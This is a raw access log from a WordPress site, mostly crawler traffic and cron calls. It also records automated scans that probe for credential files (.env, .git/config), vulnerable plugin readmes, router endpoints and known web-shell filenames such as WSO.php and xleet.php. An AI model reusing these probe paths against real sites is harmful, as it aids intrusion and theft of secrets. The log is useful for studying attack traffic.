File: //home/logs/cqqizhou_access_2025-10-18.log
36.133.115.36 - - [18/Oct/2025:00:01:28 +0800] "POST /wp-cron.php?doing_wp_cron=1760716888.2984800338745117187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
183.134.59.131 - - [18/Oct/2025:00:01:28 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 7.1.1; vivo X20A Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044304 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/WIFI Language/zh_CN"
42.236.12.207 - - [18/Oct/2025:00:17:16 +0800] "GET / HTTP/1.1" 200 33932 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [18/Oct/2025:00:18:14 +0800] "POST /wp-cron.php?doing_wp_cron=1760717894.2438619136810302734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
180.184.98.189 - - [18/Oct/2025:00:18:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 10; V1950A; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36 VivoBrowser/20.2.3.0"
180.184.98.189 - - [18/Oct/2025:00:18:15 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Linux; Android 10; V1950A; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36 VivoBrowser/20.2.3.0"
36.133.115.36 - - [18/Oct/2025:00:26:43 +0800] "POST /wp-cron.php?doing_wp_cron=1760718403.8713459968566894531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.178.110.15 - - [18/Oct/2025:00:26:43 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
36.133.115.36 - - [18/Oct/2025:00:54:57 +0800] "POST /wp-cron.php?doing_wp_cron=1760720096.9910430908203125000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.22.148.36 - - [18/Oct/2025:00:54:57 +0800] "GET /.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
165.22.148.36 - - [18/Oct/2025:00:54:58 +0800] "GET /.git/config HTTP/1.1" 404 8989 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
43.157.38.228 - - [18/Oct/2025:00:55:02 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.38.228 - - [18/Oct/2025:00:55:05 +0800] "GET / HTTP/1.1" 200 33466 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Oct/2025:01:08:32 +0800] "POST /wp-cron.php?doing_wp_cron=1760720912.4096920490264892578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.167.245.18 - - [18/Oct/2025:01:08:32 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000 HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Oct/2025:01:37:00 +0800] "POST /wp-cron.php?doing_wp_cron=1760722620.7459208965301513671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [18/Oct/2025:01:37:00 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [18/Oct/2025:01:57:28 +0800] "POST /wp-cron.php?doing_wp_cron=1760723848.1283190250396728515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.159.148.221 - - [18/Oct/2025:01:57:28 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Oct/2025:02:10:42 +0800] "POST /wp-cron.php?doing_wp_cron=1760724642.1926989555358886718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
220.181.108.110 - - [18/Oct/2025:02:10:42 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.91 - - [18/Oct/2025:02:10:43 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [18/Oct/2025:02:11:57 +0800] "POST /wp-cron.php?doing_wp_cron=1760724717.5782470703125000000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [18/Oct/2025:02:11:58 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [18/Oct/2025:02:31:25 +0800] "POST /wp-cron.php?doing_wp_cron=1760725885.8205850124359130859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.27 - - [18/Oct/2025:02:31:25 +0800] "GET /userLogin.asp HTTP/1.1" 301 5 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
174.129.168.100 - - [18/Oct/2025:02:43:16 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
36.133.115.36 - - [18/Oct/2025:02:46:45 +0800] "POST /wp-cron.php?doing_wp_cron=1760726805.7910110950469970703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.209.143.66 - - [18/Oct/2025:02:46:46 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Oct/2025:03:05:36 +0800] "POST /wp-cron.php?doing_wp_cron=1760727936.9475049972534179687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
183.134.59.131 - - [18/Oct/2025:03:05:36 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
183.134.59.131 - - [18/Oct/2025:03:05:37 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
36.133.115.36 - - [18/Oct/2025:03:11:13 +0800] "POST /wp-cron.php?doing_wp_cron=1760728273.8547759056091308593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.167.144.54 - - [18/Oct/2025:03:11:13 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
183.134.59.131 - - [18/Oct/2025:03:11:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
183.134.59.131 - - [18/Oct/2025:03:11:16 +0800] "GET / HTTP/1.1" 200 33467 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
36.133.115.36 - - [18/Oct/2025:03:16:21 +0800] "POST /wp-cron.php?doing_wp_cron=1760728581.6562500000000000000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
123.150.138.198 - - [18/Oct/2025:03:16:21 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
123.150.138.198 - - [18/Oct/2025:03:16:30 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
123.150.138.198 - - [18/Oct/2025:03:16:30 +0800] "HEAD / HTTP/1.1" 301 0 "-" "\x22Mozilla/5.0"
123.150.138.198 - - [18/Oct/2025:03:16:30 +0800] "GET /nmaplowercheck1760728589 HTTP/1.1" 404 31381 "-" "\x22Mozilla/5.0"
123.150.138.198 - - [18/Oct/2025:03:16:30 +0800] "POST /sdk HTTP/1.1" 404 31381 "-" "\x22Mozilla/5.0"
123.150.138.198 - - [18/Oct/2025:03:16:31 +0800] "GET / HTTP/1.1" 301 5 "-" "\x22Mozilla/5.0"
123.150.138.198 - - [18/Oct/2025:03:16:31 +0800] "GET /HNAP1 HTTP/1.1" 404 31381 "-" "\x22Mozilla/5.0"
123.150.138.198 - - [18/Oct/2025:03:16:31 +0800] "GET /evox/about HTTP/1.1" 404 31381 "-" "\x22Mozilla/5.0"
36.133.115.36 - - [18/Oct/2025:03:16:50 +0800] "POST /wp-cron.php?doing_wp_cron=1760728610.8884859085083007812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
123.150.138.198 - - [18/Oct/2025:03:16:50 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
123.150.138.198 - - [18/Oct/2025:03:16:51 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
27.188.86.14 - - [18/Oct/2025:03:22:18 +0800] "GET / HTTP/1.1" 200 33932 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
36.133.115.36 - - [18/Oct/2025:03:35:24 +0800] "POST /wp-cron.php?doing_wp_cron=1760729724.5734009742736816406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
116.179.32.155 - - [18/Oct/2025:03:35:24 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.32.169 - - [18/Oct/2025:03:35:24 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [18/Oct/2025:03:39:37 +0800] "POST /wp-cron.php?doing_wp_cron=1760729977.5490159988403320312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.96.129.4 - - [18/Oct/2025:03:39:37 +0800] "GET /index.htm HTTP/1.1" 301 5 "-" "Mozilla/5.0"
36.133.115.36 - - [18/Oct/2025:03:53:12 +0800] "POST /wp-cron.php?doing_wp_cron=1760730792.6287269592285156250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [18/Oct/2025:03:53:13 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [18/Oct/2025:04:39:08 +0800] "POST /wp-cron.php?doing_wp_cron=1760733548.5477969646453857421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.141.86 - - [18/Oct/2025:04:39:08 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [18/Oct/2025:04:46:56 +0800] "POST /wp-cron.php?doing_wp_cron=1760734016.6160318851470947265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.171.207.2 - - [18/Oct/2025:04:46:56 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
209.38.134.171 - - [18/Oct/2025:04:54:04 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
36.133.115.36 - - [18/Oct/2025:04:54:37 +0800] "POST /wp-cron.php?doing_wp_cron=1760734477.4643199443817138671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [18/Oct/2025:04:54:38 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
196.251.86.13 - - [18/Oct/2025:05:02:21 +0800] "GET /freichat/client/plugins/upload/upload.php HTTP/1.1" 404 27 "-" "ALittle Client"
36.133.115.36 - - [18/Oct/2025:05:16:52 +0800] "POST /wp-cron.php?doing_wp_cron=1760735812.0758640766143798828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [18/Oct/2025:05:16:52 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [18/Oct/2025:05:22:37 +0800] "POST /wp-cron.php?doing_wp_cron=1760736157.4878759384155273437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.121 - - [18/Oct/2025:05:22:37 +0800] "HEAD /.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
36.133.115.36 - - [18/Oct/2025:05:44:26 +0800] "POST /wp-cron.php?doing_wp_cron=1760737466.8427450656890869140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [18/Oct/2025:05:44:26 +0800] "HEAD /app/config/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14"
36.133.108.119 - - [18/Oct/2025:05:44:39 +0800] "HEAD /www/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
36.133.115.36 - - [18/Oct/2025:05:45:07 +0800] "POST /wp-cron.php?doing_wp_cron=1760737507.0761139392852783203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [18/Oct/2025:05:45:07 +0800] "HEAD /public/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
36.133.108.121 - - [18/Oct/2025:05:45:18 +0800] "HEAD /core/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; es-es) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
36.133.108.121 - - [18/Oct/2025:05:45:19 +0800] "HEAD /base/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
36.133.108.119 - - [18/Oct/2025:05:45:20 +0800] "HEAD /src/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14"
36.133.108.119 - - [18/Oct/2025:05:45:22 +0800] "HEAD /cgi-bin/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36"
36.133.115.36 - - [18/Oct/2025:05:46:14 +0800] "POST /wp-cron.php?doing_wp_cron=1760737574.8514320850372314453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.132.153.122 - - [18/Oct/2025:05:46:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
168.119.15.167 - - [18/Oct/2025:05:47:01 +0800] "GET / HTTP/1.1" 200 33932 "-" "LinkBloom/2.7.11 (Educational Domain Discovery; +https://hamidsoltani.com/linkbloom)"
36.133.115.36 - - [18/Oct/2025:05:52:18 +0800] "POST /wp-cron.php?doing_wp_cron=1760737938.7185258865356445312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.209.143.66 - - [18/Oct/2025:05:52:19 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Oct/2025:05:52:53 +0800] "POST /wp-cron.php?doing_wp_cron=1760737973.1563560962677001953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.136.150.72 - - [18/Oct/2025:05:52:53 +0800] "GET /wp-content/plugins/aone-sms/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
103.136.150.72 - - [18/Oct/2025:05:52:53 +0800] "GET /wp-content/plugins/wp-nssuser-register/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
103.136.150.72 - - [18/Oct/2025:05:52:53 +0800] "GET /wp-content/plugins/excel-like-price-change-for-woocommerce-and-wp-e-commerce-light/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
103.136.150.72 - - [18/Oct/2025:05:52:53 +0800] "GET /wp-content/plugins/learning-management-system/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
103.136.150.72 - - [18/Oct/2025:05:52:53 +0800] "GET /wp-content/plugins/user-registration/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
103.136.150.72 - - [18/Oct/2025:05:52:53 +0800] "GET /wp-content/plugins/simple-dashboard/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
103.136.150.72 - - [18/Oct/2025:05:52:53 +0800] "GET /wp-content/plugins/wp-realestate/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.136.150.72 - - [18/Oct/2025:05:52:53 +0800] "GET /wp-content/plugins/quentn-wp/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/117.0"
103.136.150.72 - - [18/Oct/2025:05:52:54 +0800] "GET /wp-content/plugins/profitori/readme.txt HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
103.136.150.72 - - [18/Oct/2025:05:52:54 +0800] "GET /wp-content/plugins/javo-core/readme.txt HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
103.136.150.72 - - [18/Oct/2025:05:52:54 +0800] "GET /wp-content/plugins/demo-my-wordpress/readme.txt HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
103.136.150.72 - - [18/Oct/2025:05:52:54 +0800] "GET /wp-content/plugins/user-drop-down-roles-in-registration/readme.txt HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
103.136.150.72 - - [18/Oct/2025:05:52:54 +0800] "GET /wp-content/plugins/beyondcart/readme.txt HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0"
103.136.150.72 - - [18/Oct/2025:05:52:54 +0800] "GET /wp-content/plugins/wp-mlm/readme.txt HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15"
103.136.150.72 - - [18/Oct/2025:05:52:54 +0800] "GET /wp-content/plugins/miniorange-firebase-sms-otp-verification/readme.txt HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
103.136.150.72 - - [18/Oct/2025:05:52:54 +0800] "GET /wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
103.136.150.72 - - [18/Oct/2025:05:52:54 +0800] "GET /wp-content/plugins/salesking/readme.txt HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (X11; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
103.136.150.72 - - [18/Oct/2025:05:52:54 +0800] "GET /wp-content/plugins/woo-social-login/readme.txt HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
103.136.150.72 - - [18/Oct/2025:05:52:54 +0800] "GET /wp-content/plugins/userplus/readme.txt HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
36.133.115.36 - - [18/Oct/2025:05:57:09 +0800] "POST /wp-cron.php?doing_wp_cron=1760738229.7572100162506103515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.140.71.81 - - [18/Oct/2025:05:57:09 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
36.133.115.36 - - [18/Oct/2025:05:58:25 +0800] "POST /wp-cron.php?doing_wp_cron=1760738305.6489698886871337890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.242.226.102 - - [18/Oct/2025:05:58:25 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.102 - - [18/Oct/2025:05:58:27 +0800] "GET / HTTP/1.1" 200 33932 "http://36.133.115.36:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
40.86.42.69 - - [18/Oct/2025:05:59:45 +0800] "GET /WSO.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:46 +0800] "GET /a.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:46 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:46 +0800] "GET /aaa.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:46 +0800] "GET /ab.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:47 +0800] "GET /lock360.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:47 +0800] "GET /anonse/lock360.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:47 +0800] "GET /file5.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:47 +0800] "GET /sitemaps.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:48 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:48 +0800] "GET /load.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:48 +0800] "GET /k.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:48 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:49 +0800] "GET /post.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:49 +0800] "GET /1.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:49 +0800] "GET /flower.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:49 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:50 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:50 +0800] "GET /default.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:50 +0800] "GET /defaults.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:50 +0800] "GET /meta.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [18/Oct/2025:05:59:51 +0800] "POST /wp-cron.php?doing_wp_cron=1760738391.5352709293365478515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
40.86.42.69 - - [18/Oct/2025:05:59:51 +0800] "GET /index.php HTTP/1.1" 301 5 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:52 +0800] "GET / HTTP/1.1" 200 153674 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:52 +0800] "GET /yindu.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:53 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:53 +0800] "GET /randkeyword.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:53 +0800] "GET /goods.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:53 +0800] "GET /hehe.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:54 +0800] "GET /user.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:54 +0800] "GET /wp-2019.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:54 +0800] "GET /chosen.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:54 +0800] "GET /functions.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:54 +0800] "GET /cron.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:55 +0800] "GET /edit.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:55 +0800] "GET /gecko-new.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:55 +0800] "GET /cookie.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:55 +0800] "GET /xleet.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:56 +0800] "GET /spip.php HTTP/1.1" 404 27 "-" "-"
40.86.42.69 - - [18/Oct/2025:05:59:56 +0800] "GET /22.php HTTP/1.1" 404 27 "-" "-"
